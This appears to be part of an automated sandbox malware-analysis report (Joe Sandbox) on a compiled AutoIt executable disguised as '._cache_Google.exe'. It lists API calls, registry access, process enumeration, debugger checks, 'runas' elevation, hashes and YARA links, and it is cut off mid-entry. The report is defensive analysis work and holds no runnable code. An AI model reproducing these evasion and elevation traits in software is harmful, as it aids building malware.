                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00571120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00571124,?,?), ref: 004B37EE
                                                                                                                                                                                • Part of subcall function 004B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004B352A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                                                                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00562934,00000010), ref: 005221C5
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?), ref: 005221FD
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00522232
                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0054DAA4), ref: 00522290
                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00522297
                                                                                                                                                                                • Part of subcall function 004B30A5: GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(00000063), ref: 004B30D5
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(000000A4), ref: 004B30E7
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(000000A2), ref: 004B30F9
                                                                                                                                                                                • Part of subcall function 004B30A5: RegisterClassExW.USER32(?), ref: 004B3167
                                                                                                                                                                                • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                                                                                                                                                • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                                                                                                                                                • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F00
                                                                                                                                                                                • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F09
                                                                                                                                                                                • Part of subcall function 004B3598: _memset.LIBCMT ref: 004B35BE
                                                                                                                                                                                • Part of subcall function 004B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\._cache_Google.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"W
                                                                                                                                                                              • API String ID: 4253510256-3084681909
                                                                                                                                                                              • Opcode ID: 46b2ceba2873f6087c65bcd673a0d97df7d9f3d657c6f49684c3898d7687cad6
                                                                                                                                                                              • Instruction ID: 883924b4ebd2404bbc56d33ff6c485ab78a2a58faf97bb5c1a184cd201498bb8
                                                                                                                                                                              • Opcode Fuzzy Hash: 46b2ceba2873f6087c65bcd673a0d97df7d9f3d657c6f49684c3898d7687cad6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A512D74604144BBCB10BFA6BC46FED3FB4AB25705F00005BF64596191CA744A89FB7E
                                                                                                                                                                              Function 005130AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1169 5130ad-51315b call 4bca8e call 4bd3d2 * 3 call 4b84a6 call 513d7b call 513af7 1184 513166-513170 1169->1184 1185 51315d-513161 1169->1185 1187 5131a2 1184->1187 1188 513172-513187 RegConnectRegistryW 1184->1188 1186 5131e6-5131f2 call 4fd7e4 1185->1186 1199 513504-513527 call 4b5cd3 * 3 1186->1199 1191 5131a6-5131c3 RegOpenKeyExW 1187->1191 1189 513189-51319a call 4b7ba9 1188->1189 1190 51319c-5131a0 1188->1190 1189->1186 1190->1191 1194 5131c5-5131d7 call 4b7ba9 1191->1194 1195 5131f7-513227 call 4b84a6 RegQueryValueExW 1191->1195 1207 5131e3-5131e4 1194->1207 1208 5131d9-5131dd RegCloseKey 1194->1208 1204 513229-513239 call 4b7ba9 1195->1204 1205 51323e-513254 call 4b7ba9 1195->1205 1215 5134df-5134e6 call 4fd7e4 1204->1215 1216 51325a-51325f 1205->1216 1217 5134dc-5134dd 1205->1217 1207->1186 1208->1207 1224 5134eb-5134fc RegCloseKey 1215->1224 1220 513265-513268 1216->1220 1221 51344c-513498 call 4d010a call 4b84a6 RegQueryValueExW 1216->1221 1217->1215 1225 5133d9-513411 call 4fad14 call 4b84a6 RegQueryValueExW 1220->1225 1226 51326e-513273 1220->1226 1244 5134b4-5134ce call 4b7ba9 call 4fd7e4 1221->1244 1245 51349a-5134a6 1221->1245 1224->1199 1228 5134fe-513502 RegCloseKey 1224->1228 1225->1224 1251 513417-513447 call 4b7ba9 call 4fd7e4 call 4c2570 1225->1251 1230 513279-51327c 1226->1230 1231 51338d-5133d4 call 4b84a6 RegQueryValueExW call 4c2570 1226->1231 1228->1199 1235 5132de-51332b call 4d010a call 4b84a6 RegQueryValueExW 1230->1235 1236 51327e-513281 1230->1236 1231->1224 1235->1244 1260 513331-513348 1235->1260 1236->1217 1241 513287-5132d9 call 4b84a6 RegQueryValueExW call 4c2570 1236->1241 1241->1224 1265 5134d3-5134da call 4d017e 1244->1265 1250 5134aa-5134b2 call 4bca8e 1245->1250 1250->1265 1251->1224 1260->1250 1264 51334e-513355 1260->1264 1267 513357-513358 1264->1267 1268 51335c-513361 1264->1268 1265->1224 1267->1268 1271 513363-513367 1268->1271 1272 513376-51337b 1268->1272 1275 513371-513374 1271->1275 1276 513369-51336d 1271->1276 1272->1250 1277 513381-513388 1272->1277 1275->1271 1275->1272 1276->1275 1277->1250
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051317F
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0051321E
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005132B6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005134F5
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00513502
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1240663315-0
                                                                                                                                                                              • Opcode ID: b379394da0f9ca56356bfb455392eea82a3163d9382268a8cec2d7565f5adfb5
                                                                                                                                                                              • Instruction ID: a21cc54dc9580a6236b317e3c15ecaa88f03c3daf5b86fe4e4bed89c41f79a21
                                                                                                                                                                              • Opcode Fuzzy Hash: b379394da0f9ca56356bfb455392eea82a3163d9382268a8cec2d7565f5adfb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E16B35204200AFDB14DF25C894E6ABBF9FF88724B04896EF44ADB261DB35ED45CB51
                                                                                                                                                                              Function 004CE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004CE4A7
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0054DC28,?,?), ref: 004CE567
                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5BC
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5C7
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5DA
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5E4
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5F0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2717633055-0
                                                                                                                                                                              • Opcode ID: 22a48b780ef9e5a9c53e33add2607d459a744fd66510ecdda24da9d2a1f261b9
                                                                                                                                                                              • Instruction ID: d77789f1447a35d79beb2211e69d2310d5f00f4eefd23fd8c65d3bffe5b1823f
                                                                                                                                                                              • Opcode Fuzzy Hash: 22a48b780ef9e5a9c53e33add2607d459a744fd66510ecdda24da9d2a1f261b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0261F1B5809290EBCF15CFA998C06E97FB46F2A304F1845DED8449B347D728C949CB2A
                                                                                                                                                                              Function 004B31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004B3202
                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 004B3219
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 005257D7
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 005257EC
                                                                                                                                                                              • LockResource.KERNEL32(?), ref: 005257FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                              • Opcode ID: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                                                                                                                                              • Instruction ID: 85ba8ee9e22b84a81c83e00aca906ea829c43fa5b11b258444ac988d1c55c40e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                                                                                                                                              • Instruction Fuzzy Hash: 84117974200701BFEB258F66FC4AF677BB9EBC9B42F208469F40296290DB71DD049A70
                                                                                                                                                                              Function 004F6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 004F6FAC
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6FD0
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6FE3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1605983538-0
                                                                                                                                                                              • Opcode ID: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                                                                                                                                              • Instruction ID: 15368c93121fd84bacccbb3a9f4fb28405a045fda4044a57a1857885731b4f74
                                                                                                                                                                              • Opcode Fuzzy Hash: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                                                                                                                                              • Instruction Fuzzy Hash: 352156B1904219AFDB10ABA0DC88BEEB7BDAF54304F1004DAF605D3241EB799F84DB65
                                                                                                                                                                              Function 004FEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 004F78CB
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004FF04D
                                                                                                                                                                              • CoCreateInstance.OLE32(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FF066
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004FF083
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 2126378814-24824748
                                                                                                                                                                              • Opcode ID: 5227451e82deb2945366ba669d58bf8b893a1f8bcc33c1d4ce01c4d2cf9c8ad2
                                                                                                                                                                              • Instruction ID: d7906453ae6fc5d8a4ddc94110f875b29a8897423b6e1ba3ff770d51f6800902
                                                                                                                                                                              • Opcode Fuzzy Hash: 5227451e82deb2945366ba669d58bf8b893a1f8bcc33c1d4ce01c4d2cf9c8ad2
                                                                                                                                                                              • Instruction Fuzzy Hash: 1EA144356042059FC700DF14C984E6ABBE9BF88324F04899EF9969B3A1DB35EC09CB95
                                                                                                                                                                              Function 004CDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(004BC848,004BC848), ref: 004CDDA2
                                                                                                                                                                              • FindFirstFileW.KERNEL32(004BC848,?), ref: 00524A83
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesFindFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4185537391-0
                                                                                                                                                                              • Opcode ID: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                                                                                                                                              • Instruction ID: bff4dc4306f6731882c783e2631efd6a385da51ec33d4cc740d4dc8f3d4b0b1f
                                                                                                                                                                              • Opcode Fuzzy Hash: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE0D8318144116742146738FC4D8EE7B7D9E06338B10071AF836C21E0E7749D55D9FA
                                                                                                                                                                              Function 004BDCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 02941d5a75eb19c0ae0079a20b70dc8702a683012dfc1a4fcbb333efb5332d1b
                                                                                                                                                                              • Instruction ID: fc3c2c15fe6cf54e4426d22c26510a0e846df279cb9caf151d35a971045180a9
                                                                                                                                                                              • Opcode Fuzzy Hash: 02941d5a75eb19c0ae0079a20b70dc8702a683012dfc1a4fcbb333efb5332d1b
                                                                                                                                                                              • Instruction Fuzzy Hash: A322AC70E052158FDB14DF58C490BFAB7F0FF59304F1480AAE8469B391E779A885CBA9
                                                                                                                                                                              Function 004C3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3964851224-0
                                                                                                                                                                              • Opcode ID: ddee1e21e802b71431c40afac543b2aff1e0342526b75a1924011c5ad87417d2
                                                                                                                                                                              • Instruction ID: 703aeabff22674577a4587a35b7399fb203890259f54c81e2e915c8c5aff9a29
                                                                                                                                                                              • Opcode Fuzzy Hash: ddee1e21e802b71431c40afac543b2aff1e0342526b75a1924011c5ad87417d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 13929C746083018FD764DF19C490F6ABBE0BF89308F14885EE98A8B392D779ED45CB56
                                                                                                                                                                              Function 0052C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                              • Opcode ID: 64fc8a659e437cab47a783772610c07d147e84a1c7a22512ccfa2844ed9c239b
                                                                                                                                                                              • Instruction ID: 37d858c9a643de2cf0ea8e15aff1ea8b884f43ef1af89474732bd0039ac344bd
                                                                                                                                                                              • Opcode Fuzzy Hash: 64fc8a659e437cab47a783772610c07d147e84a1c7a22512ccfa2844ed9c239b
                                                                                                                                                                              • Instruction Fuzzy Hash: 46C04CB140401DDFD715CB80D9499EFB7BCBB14300F104495A115E1140D7709B459B71
                                                                                                                                                                              Function 004BE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                                                                                                                                              • timeGetTime.WINMM ref: 004BE51A
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 004BE646
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 004BE651
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                                                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 004BE697
                                                                                                                                                                              • DestroyWindow.USER32 ref: 004BE6A3
                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004BE6BD
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00525B15
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 005262AF
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 005262BD
                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005262D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                              • API String ID: 2641332412-570651680
                                                                                                                                                                              • Opcode ID: 1a82436a7fae32e55f0d9cfa7180547253cc792bee01f73fc5a6f6b21dcce545
                                                                                                                                                                              • Instruction ID: 317cae6480f19941134a8b6f02341eabd4f0fa9d860d4c34ffab7ac9e1c5ddfb
